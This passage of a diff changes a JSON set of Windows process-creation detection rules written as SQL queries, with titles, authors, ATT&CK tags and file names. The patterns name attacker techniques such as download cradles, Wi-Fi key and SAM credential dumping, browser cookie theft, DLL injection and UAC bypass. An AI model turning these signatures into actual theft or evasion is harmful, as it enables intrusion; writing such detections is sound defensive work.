CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "attack.execution", + "attack.t1059" ], - "filename": "proc_creation_win_lolbin_tracker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" - ], + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "status": "experimental", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", "status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", - "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "status": "experimental", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1047", - "attack.t1220", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.discovery", - "attack.persistence", "attack.defense_evasion", - "attack.credential_access", "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", - "author": "frack113", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 